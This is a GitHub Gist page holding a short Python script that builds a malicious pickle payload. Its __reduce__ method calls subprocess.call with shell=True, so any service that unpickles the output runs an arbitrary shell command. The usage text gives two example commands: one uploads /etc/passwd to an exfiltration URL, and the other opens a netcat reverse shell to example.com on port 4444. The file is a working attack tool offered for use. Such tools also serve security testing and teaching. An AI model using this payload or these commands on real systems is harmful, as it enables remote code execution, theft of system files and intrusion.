Created
July 31, 2018 05:28
-
-
Save cqsd/7be7ba27aaf06fc9ef826185e5710264 to your computer and use it in GitHub Desktop.
i don't know how to paste with newlines from windows to the linux subsystem, so here we are. im gonna curl it to my own machine
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import codecs | |
| import pickle | |
| import subprocess | |
| def exploit(cmd): | |
| class Exploit(object): | |
| def __reduce__(self): | |
| # We want shell=True so that we can pass cmd as a string directly. | |
| # There's no easy way to use kwargs in __reduce__, so we fill in | |
| # defaults until the shell=True argument. | |
| return ( | |
| subprocess.call, | |
| (cmd, 0, None, None, None, None, None, False, True) | |
| ) | |
| return Exploit() | |
| USAGE = ''' | |
| Usage: {} CMD | |
| CMD is a shell expression | |
| Examples: | |
| python {} 'curl -sF "file=@/etc/passwd" example.com/exfil' | |
| python {} 'rm /tmp/a;mkfifo /tmp/a;/bin/sh -i </tmp/a 2>&1|nc example.com 4444 >/tmp/a' | |
| '''.format(__file__, __file__, __file__) | |
| if __name__ == '__main__': | |
| import sys | |
| if len(sys.argv) != 2: | |
| sys.stderr.write(USAGE) | |
| sys.exit(1) | |
| cmd = sys.argv[1] | |
| payload = ''.join(codecs.encode(pickle.dumps(exploit(cmd)), 'base64').split('\n')).strip() | |
| print(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment